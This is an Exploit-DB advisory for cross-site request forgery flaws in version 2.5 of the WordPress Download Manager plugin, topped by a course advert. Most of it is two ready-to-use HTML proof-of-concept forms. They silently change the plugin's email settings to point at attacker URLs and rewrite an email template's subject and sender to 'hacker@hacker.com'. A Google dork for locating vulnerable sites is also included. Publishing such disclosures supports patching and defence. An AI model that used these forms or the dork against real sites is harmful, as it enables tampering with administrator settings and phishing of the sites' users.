WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery

EDB-ID:

47251

CVE:

N/A




Platform:

PHP

Date:

2019-08-14


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
# Google Dork: inurl:"/wp-content/plugins/download-manager
# Date: 24 may, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://www.wpdownloadmanager.com/
# Software Link: https://wordpress.org/plugins/download-manager/
# Tested on: Apache/2.2.24 (CentOS)
POC 

#1 

There is no CSRF nonce check performed in "POST
/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. 

#Code

<form method="POST"
action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
<input type="hidden" name="__wpdm_email_template" value="default.html">
<input type="hidden" name="__wpdm_email_setting[logo]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[banner]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[footer_text]"
value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[youtube]"
value="https://malicious-url.com">
<input type="submit">
</form>

#2

There is no CSRF nonce check performed in "POST
/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
e&id=default" request.

#Code

<form method="POST"
action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
task=EditEmailTemplate&id=default">
<input type="hidden" name="id" value="default">
<input type="hidden" name="email_template[subject]" value="forget password">
<input type="hidden" name="email_template[message]" value="aaa">
<input type="hidden" name="email_template[from_name]" value="hacker">
<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
<input type="submit">
</form>